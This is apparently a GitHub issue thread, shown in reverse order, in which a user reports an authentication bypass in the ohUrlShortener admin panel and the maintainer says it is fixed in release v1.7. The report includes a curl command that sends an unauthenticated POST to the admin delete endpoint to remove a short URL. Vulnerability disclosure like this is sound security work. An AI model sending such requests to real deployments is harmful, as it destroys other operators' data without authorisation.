Closed douglas-oliveira-tc closed 2 years ago
I'll check for this issue, TODAY.
Turns out, it was my bad. Sorry about it.
Already fixed this issue and drafted a new release: https://github.com/barats/ohUrlShortener/releases/tag/v1.7
That's great, thanks a lot!
That's great, thanks a lot!
I should thank you for reporting this issue.
I was implementing your project for an internal experimentation, and found a critical issue that allows unauthenticated users to bypass auth controls.
Steps to reproduce:
curl -i -s -k -X $'POST' -H $'Host: admin.ohUrlShortener.com' -H $'Referer: http://admin.ohUrlShortener.com/admin/urls' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 18' --data-binary $'short_url=Ak3vaj58' $'http://admin.ohUrlShortener.com/admin/urls/delete'
All examples were run in my environment, the address used is only for illustration purposes.